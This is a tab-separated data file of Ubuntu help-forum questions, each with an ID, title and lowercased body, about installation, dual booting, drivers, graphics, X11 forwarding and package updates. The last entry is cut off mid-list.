376988	is there a way to buy a dell dekstop/laptop with pre-installed ubuntu ?	in the near future ( probably in the year end sale season ) , i am going to buy a dell laptop . problem is , i am completely pissed off by microsoft windows 8 , which is almost universally pre-installed in dell computers . i 've heard that there are some desktops/laptops that you can buy from dell with ubuntu pre-installed . but , i did n't find such desktop/laptops in dell official site . where is the access point to buy the desktop/laptop from dell with a pre-installed ubuntu system ? if ubuntu is not available , could i buy a dell computer pre-installed with linux mint ? looks like there is a dell inspiron 15r ( n5110 ) equipped with ubuntu lts12.04 , but i did n't find it in dell official site , and do n't where to place the order .
376994	make mouse left-handed and touchpad right-handed	i see that i can configure mouse and touchpad all in one panel ( ubuntu 13.10 , defaults , gnome ) . which is to some extend . namely , i want to have the touchpad differently configured then the mouse and ... when i have an ( usb ) mouse attached i use it normally left-handed . therefore i switch the buttons to left-handed . but when i use the touchpad i feel little bit lost with that kind of configuration . therefore i wan na have it right-handed . is there a way to achieve the following : when i plugin a mouse ( respectively when it is detected ) automatically switch to left-handed and when i unplug it , switch automatically to right-handed ?
376996	low graphics on no graphics machine	i have a computer running ubuntu 12.04 installed from a slightly customized live cd , with no desktop ( it boots straight to chromium ) . recently after installing bitdefender i got the low graphics mode error . after following the instructions on every ( reinstall lightdm , reinstall graphic card drivers , poke around x11 conf and so on ) i am posting on the subject . i recreated my setup in a virtual machine . still i cant override it . so far i am pretty sure its not a graphic card issue , and installing gdm or desktop is not an option for me ( its a web only computer ) , any suggestions ?
377000	compilation error /usr/bin/ld : can not find -lz	i encountered with this error while attempted compiling fasta36 on my ubuntu 12.04.3 64 bit machine : /usr/bin/ld : can not find -lz collect2 : ld returned 1 exit status make : *** [ fasta36 ] error 1 i used following command : make -f ../make/makefile.linux64_sse2 i guessed it could be due to absence or broken symbolic link so tried to find the correct file . i could see in my /usr/lib directory following files : lrwxrwxrwx 1 root root 16 nov 18 2011 libzbar.so.0 - > libzbar.so.0.2.0 -rw-r -- r -- 1 root root 187480 nov 18 2011 libzbar.so.0.2.0 lrwxrwxrwx 1 root root 25 nov 12 18:54 libzeitgeist-1.0.so.1 - > libzeitgeist-1.0.so.1.1.4 -rw-r -- r -- 1 root root 122048 may 4 2012 libzeitgeist-1.0.so.1.1.4 lrwxrwxrwx 1 root root 18 nov 12 18:54 libzephyr.so.4 - > libzephyr.so.4.0.0 -rw-r -- r -- 1 root root 55672 apr 30 2011 libzephyr.so.4.0.0 lrwxrwxrwx 1 root root 23 nov 26 2010 libzvbi-chains.so.0 - > libzvbi-chains.so.0.0.0 -rw-r -- r -- 1 root root 60112 nov 26 2010 libzvbi-chains.so.0.0.0 lrwxrwxrwx 1 root root 17 nov 26 2010 libzvbi.so.0 - > libzvbi.so.0.13.1 -rw-r -- r -- 1 root root 546768 nov 26 2010 libzvbi.so.0.13.1 i have no idea which one of these represent the -lz ? could someone help me sort this one out here ? i appreciate your time and help .
377001	ubuntu refuses to shut down	i am very new to ubuntu . yesterday , i uninstalled and re installed ubuntu 12.04 32-bit on my acer travelmate laptop ( windows xp ) . when i clicked to shut down ubuntu , it refused to do so and i had to do a hard boot to shut it down . i would desperately appreciate receiving guidance regarding the solution to the shut down problem . thanks , foli
377002	how to restore software from backup by deja dup	how to re install software from the backup . i backup the apps and data using deja dup is it possible ? .
377004	bluetooth 3.0 macro keyboard does n't work on ubuntu 13.10	my bluetooth does n't work when i try with my phone , it detects the device as bluetooth 3.0 macro keyboard result of bluetoothd -d -n : bluetoothd [ 19586 ] : bluetooth daemon 4.101 bluetoothd [ 19586 ] : src/main.c : parse_config ( ) parsing main.conf bluetoothd [ 19586 ] : src/main.c : parse_config ( ) discovto=0 bluetoothd [ 19586 ] : src/main.c : parse_config ( ) pairto=0 bluetoothd [ 19586 ] : src/main.c : parse_config ( ) pageto=8192 bluetoothd [ 19586 ] : src/main.c : parse_config ( ) auto_to=60 bluetoothd [ 19586 ] : src/main.c : parse_config ( ) name= % h- % d bluetoothd [ 19586 ] : src/main.c : parse_config ( ) class=0x000100 bluetoothd [ 19586 ] : src/main.c : parse_config ( ) key file does not have key 'deviceid' d-bus setup failed : connection `` :1.329 '' is not allowed to own the service `` org.bluez '' due to security policies in the configuration file bluetoothd [ 19586 ] : unable to get on d-bus result of sudo service bluetooth restart : bluetooth stop/waiting bluetooth start/running , process 19408 result of hcitool dev : does n't appear anything could it because the bluetooth keyboard is 3.0 and my product is bluetooth v2.0 dongle ? how can i solve it ? other informations : uname -a linux casa-desktop 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux
377006	installing ubuntu on an asus g75vw with a dual hard drive setup	i 've been searching online and can not find an answer to this question . i have an asus g75vw with dual hard drives . i have windows 7 installed on the c drive . i want a dual boot setup that will prompt me to choose an os upon boot . does ubuntu have to loaded to a partition on the c drive to permit this setup or can i save it to the d drive and still be prompted upon boot ? thanks , joe
377007	restart then shutdown using bash scripting ?	i want to restart and then shutdown from terminal . means that we want to startup terminal after restart and then shutdown automatically . what i am doing with explanation : manually start my pc run terminal manually after working on some program for some x minutes then the program would ask for restart this restart would be done from terminal manually then after restart again terminal would startup automatically terminal would delay shutdown for some x minutes then automatically shutdown conclusion point 6 : only after restart terminal would execute some script automatically which would run for some y minutes then pc would automatically shutdown how to start up automatically after boot ? terminal automatically some script in the terminal that automatically shuts the pc down .
377008	re-sizing the partition after installing ubuntu	so i just finished installing ubuntu ( 13.10 ) alongside windows 7 ( on the same hard drive ) . however , i ran into a small problem when i was installing that had to do with the partition sizes . i wanted my partitions to look like this : /dev/sda /dev/sda1 ( windows reserved partition ) /dev/sda2 ( windows partition c : ) /dev/sda3 ( ubuntu swap ) /dev/sda4 ( ubuntu root ) /dev/sda5 ( ubunutu ( home ) but unfortunately , i was unable to make more than 2 more partitions due to `` unusable space '' which i figured out was due to not being able to have more than 4 partitions . so now i have : /dev/sda /dev/sda1 ( windows reserved partition ) /dev/sda2 ( windows partition c : ) /dev/sda3 ( ubuntu swap ) /dev/sda4 ( ubuntu root ) is there any way to go about fixing this or should i not be worried about this kind of thing ? sorry , i 'm pretty new to linux in general . edit : after doing sudo parted -i , this is what i get : model : ata wdc wd5000bpvt-2 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary ntfs boot 2 106mb 395gb 395gb primary ntfs 3 395gb 397gb 2000mb primary linux-swap ( v1 ) 4 397gb 500gb 103gb primary ext4
377013	read/write access osx 10.9 partition/home folder from ubuntu 13.10	i 'm currently trying to set up a dual boot system on my macbook pro 5.5 . i 'd like to enable read/write access on my 'macintosh hd ' ( hfs+ ) partition . various sources online have claimed that i simply need to disable journaling in osx and then change the uid in ubuntu to match my primary user on osx ( 501 ) . i 've also ensured that the permissions on my home folder in osx are set to read/write - everyone . the partition auto-mounts when i login , but selecting it from the sidebar in nautilus gives an error along the lines of `` you do not have permissions to access this disk '' . running gksudo nautilus , however , lets me navigate through the partition but fails to copy or open any files within my osx home folder . other than disabling journaling , setting my ubuntu user 's uid to 501 , and setting permissions on the osx side to allow everyone read/write access , what should i have done to utilize the mac partition ? ultimately , i 'd like to direct dropbox to use the osx folder location while on ubuntu so that it does n't need to re-sync and duplicate my dropbox contents on both os any time a change is made on one session .
377016	install multifunctional printer via lan	i have a printer epson stylus tx320f and i want to connect my pc ( ubuntu 13.10 ) via lan , can you help me ?
377020	how do i find my windows 7 files ?	i have recently started using ubuntu for the first time , and i ca n't seem to find my windows files . i 've run a few searches and the answers say that i can find them by going to filesystem > users > myname ; however , when i go there , none of my files seem to exist . i restart my computer and boot using windows and it 's all there . i would like to start using ubuntu as i have heard many good things about using linux over windows , but if i ca n't access my files then i wo n't be able to . i 've done as mentioned below and on my other searches , and here is what i get : when i try as mentioned below , i see almost the exact same thing .
377021	solr-jetty on ubuntu 12.04.3	i 've installed a fresh ubuntu 12.04.3 64bit and all current updates ! and then installed the solr-jetty package , which i 'm using successfully on ubuntu for several month now . but it is not working anymore . the jetty is starting but the solr server is not working . i 've looked into the log : 432 [ main ] error org.mortbay.log - error starting handlers java.lang.noclassdeffounderror : org/apache/commons/fileupload/fileitemfactory at org.apache.solr.servlet.solrrequestparsers. < init > ( solrrequestparsers.java:92 ) i tried to get solr manually running with tomcat , but i get the same error . any idea ? thanks
377026	grub command line is the only thing that shows after starting my laptop	i have a msi ge60 , with win8 pre installed . i installed ubuntu 13.10 on a sperate partition than where win8 is . after restart grub does n't show , the laptop goes straight to win8 . i did n't know what t do so i formatted the partition with ubuntu on it , after restarting the laptop i 'm stuck at a gnu grub version 2.00-19ubuntu2 screen i searched how to load windows using it but it says i need to load kernel . it also says hd0,0 does n't exist
377028	ca n't purge mysql-server installation	since i 've got no privileged user in my current mysql-installation on 12.04 lts i want to re-install the mysql-server completely by using : sudo apt-get purge mysql-server after a very short while i get these errors : apache2 : syntax error on line 210 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/fcgid.load : can not load /usr/lib/apache2/modules/mod_fcgid.so into server : /usr/lib/apache2/modules/mod_fcgid.so : undefined symbol : unixd_config error : config file dir.conf not properly enabled : /etc/apache2/mods-enabled/dir.conf is a real file , not touching it errors happened during editting : apache2 libapache2-mod-php5 apache2-mpm-prefork does anyone have a clue what i can do about this ? i tried everything to get rid of the pesky access denied for 'root ' @ 'localhost ' but ca n't get it to work .
377029	change ownership of vmware fusion shared folder	i 'm trying to create a soft link of my dropbox shared folder with : ln -s dropbox ~/desktop but i am not being successful . the link is created , but is broken and i ca n't access the folder through it . when i run ls -la in /mnt/hgfs i get this : dr-xr-xr-x 1 root root 4192 nov 14 17:04 . drwxr-xr-x 3 root root 4096 nov 14 16:06 .. drwx -- -- -- 1 501 dialout 782 nov 14 13:10 dropbox what is user 501 ? i tried changing the ownership of the folder to my user and to root , but none seems to work . should n't root be able to change any file or directory ownership to itself ? chown -r root : root dropbox chown : changing ownership of ‘dropbox’ : operation not permitted any help would be appreciated . thank you .
377030	how to have dedicated graphics ( amd ) working on raring 13.04/linux mint 15	i am using a hp pavillion g6-2215tx . it features an amd hd7670m dgpu and intel hd 4000 igpu . after installing all the catalyst 13.4 drivers correctly , i was met with a tty terminal informing me xserver had crashed , and told me it would n't work until mdm was configured . doing sudo aticonfig -- px-igpu resulted in everything being peachy and happy . except i was on my igpu , and could n't play much in the way of games . doing sudo aticonfig -- px-dgpu took me back to that tty screen again . as for fglrxinfo in igpu mode : westj @ twilight-sparkle ~ $ fglrxinfo display : :0.0 screen : 0 opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl version string : 3.0 mesa 9.1.7 i 'm not sure what to do , and i 'm at my wits end . what can i do to solve this issue ? it 's probably the biggest hurdle for me in transitioning out of windows . i have searched this site ( and many others ) for a solution already , and have only just been able to get my laptop into a state where i can use it without it chewing it 's battery in 40 minutes .
377031	jvm terminated . exit code = -1	i am having a same problem as discussed here i have tried all the suggestions but same problem . it only when happens when i make an attempt to open main.cfile from eclipse project . however i can buid and run default helloworld projects . 1 ) current java version java version `` 1.7.0_45 '' java ( tm ) se runtime environment ( build 1.7.0_45-b18 ) java hotspot ( tm ) 64-bit server vm ( build 24.45-b08 , mixed mode ) 2 ) checked environment variables- etc/profile export path=/usr/lib/jvm/java-7-oracle/bin : $ path 3 ) eclipse.ini content showsplash org.eclipse.platform -vmargs -dosgi.requiredjavaversion=1.7.0_45 -xms40m xmx256m 4 ) i am using ubuntu 13.04 lts 5 ) java jdk directory usr/lib/jvm/java-7-oracle 6 ) eclipse directory home/downloads/eclipse thanks for your help , please let me know if you need more info .
377033	fingerprint reader not working in dell vostro 3550	my laptop shows validity sensor device but the driver is not installed.is it possible to install fingerprint reader . i have vfs5011 validity sensor
377034	ubuntu on a tablet , i am confused	after i have installed the latest release to my inspiron duo i am a bit confused about how i could get the desktop appear and behave like a `` real '' tablet ? just like can be seen on http : //www.ubuntu.com/tablet ... is that possible at all ? must confess that these are my first steps with ubuntu . thanks in advance for your answer !
377035	nvidia graphics card not detected	so i have an nvidia geforce 610m on my laptop along with an i7 cpu . unfortunately , i do n't think my nvidia chp is being recognized . when i go into `` about this computer '' , only my intel integrated graphics are recognized . is there any way to have ubuntu recognize the chip . p.s . running sudo lshw -c display gives me this : *-display description : vga compatible controller product : gf119m [ geforce 610m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : f6000000-f6ffffff memory : e0000000-e7ffffff memory : e8000000-e9ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:48 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 )
377042	kernel panic - possible due to ir reciever ?	i use ubuntu 13.10 ( freshly installed as 13.04 and later upgraded ) on my media center - a asrock ion 3d . usually when i boot the computer , i get the result below . after rebooting one or several times , i get a successful boot . knowing very little about how stuff is working under the hood of ubuntu , i guess the problem could be related to the build-in ir reciever : rip [ < ... > ] ir_raw_event_store_with_filter ... i do n't care about ir capabilities since i never use the remote . i ca n't see an option to disable it through bios . can i somehow remove the infrared component from ubuntu ? or is my problem related to something completely different ?
377044	nvidia problems spreading	i recently received a used computer from my dad 's work . still kind of new to the whole computer gaming but i intend to eventually plan on building a good one . my current computer from my dad had a hynix red graphics card but when i tried playing team fortress 2 i kept getting various errors . eventually i found that i needed a different graphics card so i got a nvidia geforce 210 from a friend . the nvidia worked at first but i was unable to play games still because it required me to update the drivers . so i tried doing this by updating from version 304 up to 319 and after rebooting my computer to finish the update like it says to do my computers background is messed up . the background has little black and white squares and when i try to open a window it is a white box with an array of colors stretched around it . the taskbar on the side : however , is fine and completely normal . ultimately this is my current problem . now i 'm here on a different computer because i am tired of trying to blindly fix this and hoping that some will be able to help with this issue ?
377047	which package should i file a bug against for pen input ?	i have a fujitsu lifebook t900 , and i have a problem with ubuntu on it . this laptop has a touch screen meant to be used with an accompanying stylus ( i.e . it only works with the stylus , and not with finger input ) . under ubuntu 12.04 lts ( which this laptop previously ran ) , input with the stylus always worked flawlessly . however , since doing a fresh install of ubuntu 13.10 , the screen stops responding to stylus input after i suspend the laptop and wake it up again ( the keyboard and touchpad continue working though ) . this means if i want to handwrite notes or draw on my laptop , i need to restart my machine if i have closed the lid , which is pretty annoying . so , my question is this : if i were to file a bug report for this behavior , which package should i file it against ? perhaps it could also be useful if somebody could tell me what i should include in the report which would make it more useful .
377050	how do i get a mediatek mt7630e 802.11bgn wi-fi adapter working ?	its worked with the pre-installed ubuntu but after re-installing ubuntu dual boot with windows 8.1 , wifi is not working . is there a driver for this adapter that will work on ubuntu 12.04 ?
377051	i have realtek alc259 soundcard problem	whenever i am in a call on skype i ca n't get to play any other sound neither from firefox or my music player ... and skype seems to crash if i change the sound adapter settings .. what can i do ? no standalone drivers available .. i do n't know what could i do
377053	x11/ssh issues `` wrong authentication ''	i 've been having issues getting x11 to work lately - several hours of googling and trying various fixes have got me nowhere . here 's the specifics : i am trying to log in to a department computer from my laptop via ssh -x over the local network . x11 worked perfectly for quite some time , then all of a sudden i started getting the error message : `` x11 connection rejected because of wrong authentication '' i have tried about 6 different things to remedy this . i thought i had it working last week by modifying my local copy of /etc/ssh/ssh_config , specifically i uncommented the line `` forwardx11trusted yes '' . this apparently was a fluke because now it is n't working again i have also tried adding my mit-magic-cookie to the remote machine using xauth add , but this has n't seemed to work . tried everything here , in particular i have permissions for .xauthority and my discs are nowhere near full ( local and remote ) . here are the outputs of my various environment variables and so forth : $ echo $ display # local machine :0.0 $ echo $ display # remote machine localhost:10.0 $ xauth list # local laptop/unix:0 mit-magic-cookie-1 45f1f58762e8040da75508d23df6819e $ xauth list # remote # blank i image this last one is the key , but repeated attempts at xauth add on the remote machine do n't seem to change this . any ideas ? let me know if i can provide any more outputs . thanks !
377059	upgrade to 13.10 stops	i am running upgrading ubuntu to version 13.10 . half way while installing upgrades it stops at preparing inputattach . it seems that i should abort the upgrade . will this have any effect if i try to restart the computer ? , or i will need to complete the upgrade before restarting ? . i do not mind if i do not upgrade , but i am worried that having gone half way with the upgrade i will have problems restarting he computer .
377063	patching an already-installed package ?	is it possible to apply a .patch file to a package that 's already installed ? if not , and the package was installed via apt , does that mean one would have to uninstall/purge the package from apt download the package source files apply the patch to the source files install the patched-package from source redo steps 2-4 above each time they wanted to upgrade a package ? i.e. , there 's no way to use patch files and apt together ? i 've installed from source before but i 'd like to continue using apt to install/update if at all possible . thanks
377064	hvr 1900 firmware and more problems	hi i got a problem first i brought the hauppauge 930c-hd tried to install it until i saw only the 930c works , now i bought the 1900 and i think because i tried to install looks like a old firmware from the 930 older now from the 1900 i cant get it working bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 003 : id 2040:7300 hauppauge bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0bda:0129 realtek semiconductor corp . bus 001 device 004 : id 0c45:644a microdia bus 002 device 003 : id 8087:07da intel corp. dmesg [ 141.650136 ] usb 3-4 : new high-speed usb device number 3 using xhci_hcd [ 141.670239 ] usb 3-4 : new usb device found , idvendor=2040 , idproduct=7300 [ 141.670247 ] usb 3-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 141.670252 ] usb 3-4 : product : wintv [ 141.670255 ] usb 3-4 : manufacturer : hauppauge [ 141.670259 ] usb 3-4 : serialnumber : 7300-00-f0814018 [ 141.687251 ] warning : you are using an experimental version of the media stack . [ 141.687251 ] as the driver is backported to an older kernel , it does n't offer [ 141.687251 ] enough quality for its usage in production . [ 141.687251 ] use it with care . [ 141.687251 ] latest git patches ( needed if you report a bug to linux-media @ vger.kernel.org ) : [ 141.687251 ] 80f93c7b0f4599ffbdac8d964ecd1162b8b618b9 [ media ] media : st-rc : add st remote control driver [ 141.687251 ] 8ab1aa87f3f7381be195efcabf08dbc74626f25d [ media ] gpio-ir-recv : include linux/of.h header [ 141.687251 ] b91670a0e924078521a838b9e707e42012c5e76a [ media ] tvp7002 : include linux/of.h header [ 141.687486 ] cx2341x : disagrees about version of symbol v4l2_ctrl_grab [ 141.687491 ] cx2341x : unknown symbol v4l2_ctrl_grab ( err -22 ) [ 141.687504 ] cx2341x : disagrees about version of symbol v4l2_ctrl_handler_setup [ 141.687507 ] cx2341x : unknown symbol v4l2_ctrl_handler_setup ( err -22 ) [ 141.687518 ] cx2341x : disagrees about version of symbol v4l2_ctrl_new_custom [ 141.687520 ] cx2341x : unknown symbol v4l2_ctrl_new_custom ( err -22 ) [ 141.687536 ] cx2341x : disagrees about version of symbol v4l2_ctrl_new_std_menu [ 141.687540 ] cx2341x : unknown symbol v4l2_ctrl_new_std_menu ( err -22 ) [ 141.687564 ] cx2341x : disagrees about version of symbol v4l2_ctrl_activate [ 141.687569 ] cx2341x : unknown symbol v4l2_ctrl_activate ( err -22 ) [ 141.687606 ] cx2341x : unknown symbol v4l2_ctrl_handler_init ( err 0 ) [ 141.687619 ] cx2341x : disagrees about version of symbol v4l2_ctrl_new_std [ 141.687623 ] cx2341x : unknown symbol v4l2_ctrl_new_std ( err -22 ) [ 141.687636 ] cx2341x : disagrees about version of symbol v4l2_ctrl_g_ctrl [ 141.687640 ] cx2341x : unknown symbol v4l2_ctrl_g_ctrl ( err -22 ) [ 141.687652 ] cx2341x : disagrees about version of symbol v4l2_ctrl_handler_free [ 141.687657 ] cx2341x : unknown symbol v4l2_ctrl_handler_free ( err -22 ) [ 141.687671 ] cx2341x : disagrees about version of symbol v4l2_ctrl_cluster [ 141.687675 ] cx2341x : unknown symbol v4l2_ctrl_cluster ( err -22 ) would be happy for help cause i 'm not that good with ubuntu .
377066	wifi usb adaptor not getting enough power	my wireless usb adapter is a rosewill rnx-n2lx and it worked perfectly on ubuntu 12.04.3 and above but in ubuntu 12.04.1 the status of the connection says connected but there is no internet connection . i 've tried connecting to an open network too . my wireless adapter light blinks at a constant rate when it 's not getting enough power and it 's doing that on 12.04.1 . the adapter has 2 usbs connected to its mini-b connector goes into the adapter ; one main usb that holds the data and another which i presume it to be a power cable , i 'm guessing they 're connected in parallel for higher current ? as for ubuntu 12.04.1 i think that it 's not recognizing the second usb as a device so it limits the current to a minimum to save power . i 'm stuck using 12.04.1 because amd has dropped the support for my graphics card ( radeon hd 4250 ) for the kernels on 12.04.3 and onward . for my driver to work i need to have my x-server version 1.12 or lower . my other option was to downgrade my x-server but that would only be a temporary solution and can cause corruption in the long run . i need a way to permanently have 2 usb slots activated as if a device is on both of them activating it . in short i need ubuntu to recognize the second usb as a device and give it the full power it needs . lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 1bcf:0535 sunplus innovation technology inc . bus 004 device 002 : id 0b38:0010 gear head 107-key keyboard bus 002 device 002 : id 0bda:8174 realtek semiconductor corp .
377067	display issues in gnome classic after upgrade	i just upgraded from 13.04 to 13.10 . i 've noticed some graphical issues using gnome classic that were not there before : notifications no longer appear ( for example when changing the volume ) . notify-osd is visible in dconf-editor , but i do n't really know how to check that the notifications are enabled for sure . i do n't see why they would have been disabled . the icons in the application switcher ( alt tab ) are huge -- about 6 times the size of the box that surrounds the icon being displayed . i 've tried updating the nvidia drivers , but i 'm not sure of the best way to go about this sudo apt-get update sudo apt-get install nvidia-310 # does nothing ; already installed this has fixed graphical issues for me in the past . on a possibly related note , when i try to boot the 3.11 kernel the desktop no longer starts , and i ca n't start it using startx , etc . the desktop did load the first time i used it , but it had the same graphical issues . now it wo n't , so i have to boot the 3.8 backup . i think that these issues may be related in some way .
377072	ubuntu 12.04 installer does n't recognize other os	i want to install ubuntu 12.04 alongside windows 8 on a dell inspiron se the installer says i currently have no detected operating systems . is it ok to go ahead with the install using the `` something else '' option and putting ubuntu on a partition or will it wreck my windows 8 ?
377074	installation takes very long	first time i try ubuntu and with dual boot with win8.1 but had to rezise my hdd and create new partition and i guess that went right but install takes very long with deleting of conflicting operating system files ( dont know correct sentence in english , as i try to install dutch version ) in dutch it says `` verwijderen van conflicterende besturingsystemen '' already waiting about 30-40 minutes thanks in advance edit : it doesnt give any errors as far as i can see so im gon na try and skip this step edit2 : and i cant press the skip button
377075	juju on windows - unable to bootstrap	im trying to run juju on windows 8.1 x64 and connect to my azure account . i 'm having a terrible time finding info on how to actually configure the yaml file on windows , there is no documentation out there ... . in any case , my juju bootstrap errors out on the `` management-certificate-path '' setting . i have followed the standard documentation for generating/uploading a management certificate for windows azure , and pointing to this key in my yaml file ( if i need to do it in some other way , then the documentation is going to have to tell me ) . the error i 'm getting is error parsing environment `` azure '' : no public ssh keys found i 've tried adding `` '' to the path , but that only results in `` yaml error : found unexpected bladibla '' . juju looks extremely interesting , but the lacking documentation throws me off . could someone point me to a valid step by step for getting this to work on windows ?
377078	ubuntu 13.10 loadsinto text mode after splash screen	since i tried updating ubuntu 13.04 to 13.10 my ubuntu starts in text mode after failing at splashscreen with error '' cdc_acm : this device can not make call on its own . device is not a modem '' on shutdown i also get error : modem-manager [ 2058 ] : could not get the system bus . make sure the bus daemon is running ! message : failed to connect socket to /var/run/dbus/system_bus_socket : no such file or directory i tried updating libmtp tools as well . gdm and lightdm both fails .
377081	making a bootable dvd	i hate windows 8.0 . i made a bootable usb drive and loaded unbuntu with 8.0 onto my desktop computer and it is working fine . i would like to load unbuntu onto my laptop ( acer aspire 5000 ) . it will not boot from a usb stick . i need a bootable dvd but when i try to create one the web site gives me lots of malware . i reloaded xp to get rid of all the malware . i do n't want to go back there if i do n't have to . i have tried to copy the files from the stick to a dvd using windows and again using ubuntu but the laptop would not boot from either dvd . is it possible to make a bootable dvd using my ubuntu desktop that i can use to load ubuntu onto my laptop .
377082	creating users proftpd with their own directory with lampp	i 'm completely new to the server set-up etc . and after searching some time around the internet i cant really find a clear answer on the next question : how do i create a new user for my proftpd ( lampp ) server ? - the user must have its own directory - the user may not go up in the directory . ( so no ../ in its own root ) if any more info is needed , please let me know .
377084	remove grub from data hdd	before ubuntu installation the drive had one ntfs partition with data . i used windows software to shrink the ntfs partition and create 2 more unformatted partitions for ubuntu installation . at this point i made a backup of the mbr using windows . since then , files have been added / changed on the ntfs partition but the partitions stayed the same size and no other partition was created . in removing grub so to make disk unbootable ( if i just erase ubuntu system , i still get a grub message at boot - if the disk is 1st in queue ) , is it safe for my ntfs files to replace the mbr with the one i have saved ? ? ? thanks
377087	how to install sentellic fspc package ?	i installed a package from sentellic , called fspc but seems i ca n't install it due some dependencies , how to correctly install it ?
377088	ubuntu 12.10 desktop and launcher show fuzzy lines	i have a graphics issue in ubuntu 12.10 . i 'm running a 3-year-old lenovo thinkpad sl510 . after some usage time , the desktop becomes weirdly distorted , with black lines showing on the right side . here is an image of this issue : i 'm not sure if this can be seen here , but the entire background has thin lines shifted so the image looks distorted . a similar issue appears sometimes on the launcher , where the hovering text looks like this :
377092	error mounting : mount exited with exit code	error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . can someone please help ? my external hard drive has been working fine , now all of a sudden i have this above error . how do i fix this ?
377093	what is the exact definition for `` logging in ''	radu 's answer is extremely informative here why `` who '' command does not shows `` root '' as a logged in user however this makes me wonder `` what is the exact definition for `` logging in '' in linux ? regards
377095	mythbuntu database backup - changing the number of backups saved	i would like to change the number of database backups saved from the default 5 . i have already moved the mythtv-database script to /etc/cron.daily and it is creating a backup each day instead of weekly . i also created a backuprc file with this command : echo `` dbbackupdirectory=/home/mythtv '' > ~/.mythtv/backuprc and added rotate=21 to it . - i.e . dbbackupdirectory=/var/lib/mythtv/db_backups rotate=21 it is still only saving 5 backups.i do n't really know if /.mythtv/backuprc is being used .
377098	why my update manager did not update ?	it is ubuntu 12.04.i could not update anything.it says `` requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . '' the detail is given below . could anyone please help me out . accountsservice activity-log-manager-common activity-log-manager-control-center apparmor appmenu-gtk appmenu-gtk3 apport apport-gtk apport-symptoms apt apt-fast apt-transport-https apt-utils aptdaemon aptdaemon-data bamfdaemon base-files bind9-host brasero brasero-cdrkit brasero-common busybox-initramfs busybox-static clamav clamav-base clamav-freshclam colord compiz compiz-core compiz-gnome compiz-plugins-default coreutils cups cups-bsd cups-client cups-common cups-ppdc deluge deluge-common deluge-gtk dh-apparmor dnsutils firefox firefox-globalmenu firefox-gnome-support firefox-locale-en firefox-locale-ta flashplugin-installer gdb gimp gimp-data gir1.2-gtk-3.0 gir1.2-gudev-1.0 gir1.2-javascriptcoregtk-3.0 gir1.2-webkit-3.0 gnome-accessibility-themes gnome-control-center gnome-control-center-data gnome-power-manager gnome-settings-daemon grub-common grub-pc grub-pc-bin grub2-common gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-netx-common im-switch indicator-messages indicator-status-provider-mc5 jockey-common jockey-gtk kde-style-oxygen kde-window-manager kde-window-manager-common ksysguardd landscape-client-ui-install libaccountsservice0 libamd2.2.0 libapt-inst1.4 libapt-pkg4.12 libavcodec-extra-53 libavdevice53 libavformat53 libavutil-extra-51 libbabl-0.1-0 libbamf0 libbamf3-0 libbind9-80 libbrasero-media3-1 libc-bin libc-dev-bin libc6 libc6-dev libclamav6 libcolord1 libcups2 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsmime1 libcupsppdc1 libdecoration0 libdns81 libdrm-intel1 libdrm-nouveau1a libdrm-nouveau2 libdrm-radeon1 libdrm2 libfreerdp-plugins-standard libfreerdp1 libgail-3-0 libgegl-0.2-0 libgimp2.0 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglu1-mesa libgnome-control-center1 libgnome2-0 libgnome2-bin libgnome2-common libgtk-3-0 libgtk-3-bin libgtk-3-common libgudev-1.0-0 libgwibber-gtk2 libgwibber2 libindicator-messages-status-provider1 libisc83 libisccc80 libisccfg82 libjavascriptcoregtk-1.0-0 libjavascriptcoregtk-3.0-0 libkdecorations4 libkephal4abi1 libksgrd4 libkwineffects1abi3 libkwinglutils1 libkwinnvidiahack4 libkworkspace4abi1 libldap-2.4-2 libllvm3.1 liblwres80 libmysqlclient18 libnautilus-extension1a liboverlay-scrollbar-0.2-0 liboverlay-scrollbar3-0.2-0 libparted0debian1 libperl5.14 